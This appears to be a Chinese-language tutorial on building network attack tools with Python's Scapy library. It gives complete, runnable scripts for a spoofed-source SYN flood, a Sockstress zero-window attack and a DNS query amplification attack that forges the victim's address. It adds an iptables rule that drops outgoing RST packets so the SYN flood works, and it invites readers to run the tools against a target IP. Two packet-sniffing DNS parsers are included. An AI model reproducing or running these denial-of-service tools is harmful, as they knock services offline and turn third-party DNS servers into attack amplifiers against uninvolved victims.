Python使用Scapy實現(xiàn)構(gòu)造特殊數(shù)據(jù)包
Scapy是一款Python庫,可用于構(gòu)建、發(fā)送、接收和解析網(wǎng)絡(luò)數(shù)據(jù)包。除了實現(xiàn)端口掃描外,它還可以用于實現(xiàn)各種網(wǎng)絡(luò)安全工具,例如SynFlood
攻擊,Sockstress
攻擊,DNS
查詢攻擊,ARP
攻擊,ARP
中間人等。這些工具都是基于構(gòu)造、發(fā)送和解析網(wǎng)絡(luò)數(shù)據(jù)包來實現(xiàn)的,可以用于模擬各種網(wǎng)絡(luò)攻擊,測試網(wǎng)絡(luò)安全防御措施等。Scapy是網(wǎng)絡(luò)安全領(lǐng)域中非常有用的工具之一。
1.SynFlood
Syn-Flood(Syn洪水攻擊)是一種常見的DoS
拒絕服務(wù)攻擊方式,也被稱為TCP Syn-Flood
攻擊。攻擊者利用TCP
連接建立過程中的漏洞,向目標(biāo)主機發(fā)送大量的TCP
連接請求(SYN
),目標(biāo)主機在收到這些請求后會回復(fù)一個SYN/ACK
確認請求,但是攻擊者并不回復(fù)ACK
確認,使得目標(biāo)主機在等待ACK
確認的過程中,消耗大量的系統(tǒng)資源和帶寬,從而導(dǎo)致目標(biāo)主機無法正常處理合法的連接請求,使得正常用戶無法訪問該服務(wù)。
默認情況下每一種系統(tǒng)的并發(fā)連接都是有限制的,如果惡意攻擊持續(xù)進行,將會耗盡系統(tǒng)有限的連接池資源。在Windows
系統(tǒng)下這個半開連接數(shù)是10
個,具體來說攻擊者可以通過偽造地址對服務(wù)器發(fā)起SYN
請求,服務(wù)器就會回應(yīng)SYN+ACK
此時攻擊者的主機如果拒絕發(fā)送RST+ACK
標(biāo)志,那么服務(wù)器接收不到RST
請求,就會認為客戶端還沒有準(zhǔn)備好,會重試3-5
次并且等待一個SYN Time
超時(一般30秒-2分鐘)后,丟棄這個連接,雖然有丟包的功能,但是如果攻擊者的攻擊速度大于目標(biāo)主機的丟包速度,那么TCP
連接池將被填滿,此時正常用戶將會無法連接到程序中而導(dǎo)致拒絕服務(wù)。
由于在發(fā)送SYN
報文后我們不希望接收到目標(biāo)主機回復(fù)給我們的RST
標(biāo)志,所以需要執(zhí)行如下這條防火墻命令,將發(fā)送到被害IP的RST
包丟棄,這樣就可以構(gòu)造出一個非完全TCP鏈接,也正是我們想要的效果。
iptables -A OUTPUT -p tcp --tcp-flags RST RST -d 被害主機IP地址 -j DROP
接著就是完整的攻擊代碼,這段代碼需要在Linux
系統(tǒng)下運行,在運行之前需要指定iface
網(wǎng)卡接口,當(dāng)指定后即可調(diào)用攻擊代碼代碼片段實現(xiàn)發(fā)包。
#coding=utf-8 import argparse import socket,sys,random,threading from scapy.all import * scapy.config.conf.iface = 'ens32' # 攻擊目標(biāo)主機TCP/IP半開放連接數(shù) def synflood(target,dstport): # 加鎖 semaphore.acquire() issrc = '%i.%i.%i.%i' % (random.randint(1,254),random.randint(1,254),random.randint(1,254), random.randint(1,254)) isport = random.randint(1,65535) ip = IP(src = issrc,dst = target) syn = TCP(sport = isport, dport = dstport, flags = 'S') send(ip / syn, verbose = 0) print("[+] sendp --> {} {}".format(target,isport)) # 釋放鎖 semaphore.release() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-H","--host",dest="host",type=str,help="輸入被攻擊主機IP地址") parser.add_argument("-p","--port",dest="port",type=int,help="輸入被攻擊主機端口") parser.add_argument("--type",dest="types",type=str,help="指定攻擊的載荷 (synflood)") parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻擊并發(fā)線程數(shù)") args = parser.parse_args() # 使用方式: main.py --type=synflood -H 192.168.1.1 -p 80 -t 10 if args.types == "synflood" and args.host and args.port and args.thread: semaphore = threading.Semaphore(args.thread) while True: t = threading.Thread(target=synflood,args=(args.host,args.port)) t.start() else: parser.print_help()
讀者可自行運行上述代碼,通過傳入--type=synflood -H 192.168.1.1 -p 80 -t 10
參數(shù),其含義是對192.168.1.1
主機的80
端口執(zhí)行洪水攻擊,并啟用10
個線程執(zhí)行,輸出效果圖如下所示;
2.SockStress
SockStress 全連接攻擊屬于TCP
全連接攻擊,其攻擊的原理與SYN Flood
攻擊類似,但是它使用完整的TCP三次握手,這使得它更難以檢測和防御。該攻擊的關(guān)鍵點就在于,攻擊主機將windows
窗口緩沖設(shè)置為0
實現(xiàn)拒絕服務(wù)。攻擊者向目標(biāo)發(fā)送一個很小的流量,但是會造成產(chǎn)生的攻擊流量是一個巨大的,該攻擊消耗的是目標(biāo)系統(tǒng)的CPU/內(nèi)存
資源,使用低配版的電腦,依然可以讓龐大的服務(wù)器拒絕服務(wù),也稱之為放大攻擊。
該攻擊方式通過與目標(biāo)主機建立大量的socket
連接,并且都是完整連接,最后的ACK
包,將Window
窗口大小設(shè)置為0
,客戶端不接收數(shù)據(jù),而服務(wù)器此時會認為客戶端緩沖區(qū)還沒有準(zhǔn)備好,從而一直等待下去(持續(xù)等待將使目標(biāo)機器內(nèi)存一直被占用),由于是異步攻擊,所以單機模式也可以拒絕高配的服務(wù)器。
#coding=utf-8 import argparse import socket,sys,random,threading from scapy.all import * scapy.config.conf.iface = 'ens32' # 攻擊目標(biāo)主機的Window窗口 def sockstress(target,dstport): # 加鎖 semaphore.acquire() isport = random.randint(0,65535) response = sr1(IP(dst=target)/TCP(sport=isport,dport=dstport,flags="S"),timeout=1,verbose=0) send(IP(dst=target)/ TCP(dport=dstport,sport=isport,window=0,flags="A",ack=(response[TCP].seq +1))/'\x00\x00',verbose=0) print("[+] sendp --> {} {}".format(target,isport)) # 釋放鎖 semaphore.release() if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("-H","--host",dest="host",type=str,help="輸入被攻擊主機IP地址") parser.add_argument("-p","--port",dest="port",type=int,help="輸入被攻擊主機端口") parser.add_argument("--type",dest="types",type=str,help="指定攻擊的載荷 (sockstress)") parser.add_argument("-t","--thread",dest="thread",type=int,help="指定攻擊并發(fā)線程數(shù)") args = parser.parse_args() # 使用方式: main.py --type=sockstress -H 192.168.1.1 -p 80 -t 10 if args.types == "sockstress" and args.host and args.port and args.thread: semaphore = threading.Semaphore(args.thread) while True: t = threading.Thread(target=sockstress,args=(args.host,args.port)) t.start() else: parser.print_help()
這段代碼的使用方法與SynFlood
攻擊保持一致,通過指定--type=sockstress -H 192.168.1.1 -p 80 -t 100
即可實現(xiàn)對特定主機特定端口的拒絕服務(wù),輸出效果如下圖所示;
3.DNSSelect
DNS查詢放大攻擊是一種利用域名系統(tǒng)(DNS)服務(wù)器的缺陷來放大攻擊流量的網(wǎng)絡(luò)攻擊。攻擊者通過向具有惡意域名的DNS
服務(wù)器發(fā)送DNS
查詢請求,該服務(wù)器會向被攻擊者發(fā)送響應(yīng),但是響應(yīng)內(nèi)容比請求更大。攻擊者可以利用這種響應(yīng)的放大效應(yīng),將大量流量發(fā)送到被攻擊者的系統(tǒng)上,從而導(dǎo)致系統(tǒng)資源的耗盡和服務(wù)不可用。
該攻擊可以通過欺騙和利用DNS
協(xié)議的特性進行,通常利用UDP
端口53
來執(zhí)行。攻擊者會偽造一個源IP
地址,向DNS
服務(wù)器發(fā)送一個查詢請求,請求的數(shù)據(jù)包比較小,但是響應(yīng)的數(shù)據(jù)包比請求的數(shù)據(jù)包大很多,這就導(dǎo)致了放大的效果。
DNS是域名系統(tǒng)(Domain Name System)的縮寫,是一個用于將域名轉(zhuǎn)換為IP
地址的分布式數(shù)據(jù)庫系統(tǒng)。在進行DNS
查詢時,客戶端會向DNS
服務(wù)器發(fā)送DNS
查詢請求(DNS Query,DNSQR
)包,DNS服務(wù)器則會回應(yīng)DNS
響應(yīng)(DNS Response,DNSRR
)包。
一個DNSQR包含以下重要的字段:
- 問題域名(QNAME):需要進行查詢的域名
- 查詢類型(QTYPE):查詢的類型,例如A記錄、AAAA記錄、CNAME記錄等
- 查詢類(QCLASS):查詢的類別,通常為Internet(IN)
一個DNSRR包含以下重要的字段:
- 資源記錄名稱(RR NAME):資源記錄的名稱
- 資源記錄類型(TYPE):資源記錄的類型,例如A記錄、AAAA記錄、CNAME記錄等
- 資源記錄類(CLASS):資源記錄的類別,通常為Internet(IN)
- 生存時間(TTL):資源記錄在DNS緩存中的生存時間
- 數(shù)據(jù)長度(RDLENGTH):資源記錄的數(shù)據(jù)長度
- 資源記錄數(shù)據(jù)(RDATA):資源記錄的數(shù)據(jù),例如IPv4地址、IPv6地址、域名等
我們首先使用Scapy
庫解析DNSRR
數(shù)據(jù)包,DNSRR是DNS
協(xié)議中的一種資源記錄(Resource Record),用于表示DNS
服務(wù)器返回的回答記錄。其格式包括了Name(域名)、Type(資源記錄類型)、Class(資源記錄類別)、TTL(生存時間)、RDLENGTH(數(shù)據(jù)長度)、RDATA(數(shù)據(jù))。
在DNS
響應(yīng)中,通常會有多個DNSRR
記錄,每個記錄包含一個域名對應(yīng)的IP
地址或其他資源信息。例如,一個A記錄的DNSRR
會包含一個域名和一個IPv4
地址。而MX
記錄的DNSRR
則會包含一個域名和一個郵件服務(wù)器的優(yōu)先級和地址,如下代碼實現(xiàn)了分別提取出含有查詢的域名和對應(yīng)的IP
的rrname
和rdata
變量,并將這些數(shù)據(jù)輸出到屏幕。
#coding=utf-8 from scapy.all import * from IPy import IP as PYIP # 檢查數(shù)據(jù)包的IP層,提取出IP和TTL字段的值 def Get_TTL(pkt): try: if pkt.haslayer(IP): ip_src = pkt.getlayer(IP).src ip_sport = pkt.getlayer(IP).sport ip_dst = pkt.getlayer(IP).dst ip_dport = pkt.getlayer(IP).dport ip_ttl = str(pkt.ttl) print("[+] 源地址: %15s:%-5s --> 目標(biāo)地址: %15s:%-5s --> TTL: %-5s"%(ip_src,ip_sport,ip_dst,ip_dport,ip_ttl)) except Exception: pass # 獲取本機發(fā)送出去的DNS請求所對應(yīng)的網(wǎng)站地址 def GetDNSRR(pkt): if pkt.haslayer(DNSRR): rrname = pkt.getlayer(DNSRR).rrname rdata = pkt.getlayer(DNSRR).rdata ttl = pkt.getlayer(DNSRR).ttl print("[+] 域名: {} --> 別名: {} --> TTL: {}".format(rrname,rdata,ttl)) if __name__=="__main__": sniff(prn=GetDNSRR,store=0)
讀者可自行運行上述代碼,此時當(dāng)有DNS查詢時,則會自動解析出對應(yīng)的別名以及該主機的TTL值,如下圖所示;
接著我們來解析一下DNSQR
,DNSQR是DNS
查詢請求的部分,用于DNS
協(xié)議的域名解析。DNSQR包含以下字段:
- qname:表示查詢的域名,例如www.lyshark.com
- qtype:表示查詢類型,通常為A記錄、CNAME記錄、MX記錄等
- qclass:表示查詢類別,通常為IN(Internet)
DNSQR記錄通常包含在DNS
消息中的請求部分中,請求部分也可以包含多個DNSQR
記錄,每個記錄對應(yīng)一個查詢,解析此類數(shù)據(jù)同樣很容易實現(xiàn),具體代碼如下所示;
#coding=utf-8 from scapy.all import * from IPy import IP as PYIP # 獲取本機發(fā)送出去的網(wǎng)址請求解析為IP URL --> IP def GetDNSQR(pkt): # 判斷是否含有DNSRR且存在UDP端口53 if pkt.haslayer(DNSRR) and pkt.getlayer(UDP).sport == 53: rcode = pkt.getlayer(DNS).rcode qname = pkt.getlayer(DNSQR).qname # 若rcode為3,則表示該域名不存在 if rcode == 3: print("[-] 域名解析不存在") else: print("[+] 解析存在:" + str(qname)) if __name__=="__main__": sniff(prn=GetDNSQR,store=0)
讀者可運行上述代碼,此時即可輸出當(dāng)前系統(tǒng)內(nèi)訪問過的鏈接,輸出效果如下圖所示;
接著我們就來實現(xiàn)查詢放大攻擊,查詢放大攻擊的原理是,通過網(wǎng)絡(luò)中存在的DNS
服務(wù)器資源,對目標(biāo)主機發(fā)起拒絕服務(wù)攻擊,通過偽造源地址為被攻擊目標(biāo)的地址,向DNS
遞歸服務(wù)器發(fā)起查詢請求,此時由于源IP
是偽造的,固在DNS
服務(wù)器回包的時候,會默認回給偽造的IP
地址,從而使DNS
服務(wù)成為了流量放大和攻擊的實施者,通過查詢大量的DNS
服務(wù)器,從而實現(xiàn)反彈大量的查詢流量,導(dǎo)致目標(biāo)主機查詢帶寬被塞滿,實現(xiàn)DDOS
的目的。
查詢放大攻擊的實施依賴于海量的DNS服務(wù)器資源,所以在執(zhí)行攻擊時需要自行尋找這些服務(wù)器資源,當(dāng)找到后則可存儲到文件內(nèi),當(dāng)需要使用時首先調(diào)用Inspect_DNS_Usability
函數(shù)依次驗證DNS服務(wù)器的可用性,并將可用的地址保存為pass.log
文件,當(dāng)需要發(fā)起攻擊時可通過DNS_Flood
調(diào)用并傳入合法的DNS服務(wù)器地址實現(xiàn)DNS查詢。
import os,sys,threading,time from scapy.all import * import argparse def Inspect_DNS_Usability(filename): proxy_list = [] fp = open(filename,"r") for i in fp.readlines(): try: addr = i.replace("\n","") respon = sr1(IP(dst=addr)/UDP()/DNS(rd=1,qd=DNSQR(qname="www.baidu.com")),timeout=2) if respon != "": proxy_list.append(str(respon["IP"].src)) except Exception: pass return proxy_list def DNS_Flood(target,dns): # 構(gòu)造IP數(shù)據(jù)包 ip_pack = IP() ip_pack.src = target ip_pack.dst = dns # ip_pack.src = "192.168.1.2" # ip_pack.dst = "8.8.8.8" # 構(gòu)造UDP數(shù)據(jù)包 udp_pack = UDP() udp_pack.sport = 53 udp_pack.dport = 53 # 構(gòu)造DNS數(shù)據(jù)包 dns_pack = DNS() dns_pack.rd = 1 dns_pack.qdcount = 1 # 構(gòu)造DNSQR解析 dnsqr_pack = DNSQR() dnsqr_pack.qname = "baidu.com" dnsqr_pack.qtype = 255 dns_pack.qd = dnsqr_pack respon = (ip_pack/udp_pack/dns_pack) sr1(respon) if __name__ == "__main__": parser = argparse.ArgumentParser() parser.add_argument("--mode",dest="mode",help="選擇執(zhí)行命令<check=檢查DNS可用性/flood=攻擊>") parser.add_argument("-f","--file",dest="file",help="指定一個DNS字典,里面存儲DNSIP地址") parser.add_argument("-t",dest="target",help="輸入需要攻擊的IP地址") args = parser.parse_args() # 使用方式: main.py --mode=check -f xxx.log if args.mode == "check" and args.file: proxy = Inspect_DNS_Usability(args.file) fp = open("pass.log","w+") for item in proxy: fp.write(item + "\n") fp.close() print("[+] DNS地址檢查完畢,當(dāng)前可用DNS保存為 pass.log") # 使用方式: main.py --mode=flood -f xxx.log -t 192.168.1.1 elif args.mode == "flood" and args.target and args.file: with open(args.file,"r") as fp: countent = [line.rstrip("\n") for line in fp] while True: randomDNS = str(random.sample(countent,1)[0]) print("[+] 目標(biāo)主機: {} -----> 隨機DNS: {}".format(args.target,randomDNS)) t = threading.Thread(target=DNS_Flood,args=(args.target,randomDNS,)) t.start() else: parser.print_help()
讀者可保存這段代碼,并自行準(zhǔn)備一些DNS服務(wù)器地址,放入到dns.log
目錄下,通過執(zhí)行如下所示的命令即可依次驗證服務(wù)器地址可用性,如果可用則自動保存到pass.log
文件內(nèi),輸出效果如下所示;
當(dāng)需要對特定主機發(fā)起攻擊時,可執(zhí)行如下命令,其中-t
帶指的則是需要攻擊的IP地址,輸出效果圖如下所示;
到此這篇關(guān)于Python使用Scapy實現(xiàn)構(gòu)造特殊數(shù)據(jù)包的文章就介紹到這了,更多相關(guān)Python Scapy構(gòu)造特殊數(shù)據(jù)包內(nèi)容請搜索腳本之家以前的文章或繼續(xù)瀏覽下面的相關(guān)文章希望大家以后多多支持腳本之家!
相關(guān)文章
Python使用Socket(Https)Post登錄百度的實現(xiàn)代碼
以前都是用一些高級模塊,封裝的比較好,今天嘗試使用socket模塊登錄百度,弄了半天才弄好,主要由于百度在登陸頁使用了https,我們需要對socket進行一定處理2012-05-05Django User 模塊之 AbstractUser 擴展詳解
這篇文章主要介紹了Django User 模塊之 AbstractUser 擴展詳解,具有很好的參考價值,希望對大家有所幫助。一起跟隨小編過來看看吧2020-03-03